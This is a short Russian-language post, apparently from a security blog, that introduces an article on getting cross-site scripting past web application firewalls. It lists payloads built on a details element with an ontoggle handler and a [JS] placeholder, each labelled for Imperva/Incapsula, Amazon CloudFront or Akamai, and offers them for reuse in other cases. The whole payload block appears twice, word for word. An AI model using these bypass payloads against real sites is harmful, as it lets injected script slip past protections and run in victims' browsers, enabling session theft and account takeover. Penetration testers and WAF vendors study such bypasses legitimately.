Статья по байпассу средств защиты от XSS для некоторых кейсов. Как итог, получаем несколько довольно универсальных пэйлодов, которые могут пригодится вам и в других случаях (мне пригодились):
Imperva & Incapsula:
<details/open/id="""ontoggle=[JS]>
Amazon Cloudfront
<details/open/id="""ontoggle=[JS]>
Akamai
<details open id="' "'"ontoggle=[JS]>
Еще больше байпассов для XSS доступно в репозитории на GitHub.
Imperva & Incapsula:
<details/open/id="""ontoggle=[JS]>
Amazon Cloudfront
<details/open/id="""ontoggle=[JS]>
Akamai
<details open id="' "'"ontoggle=[JS]>
Еще больше байпассов для XSS доступно в репозитории на GitHub.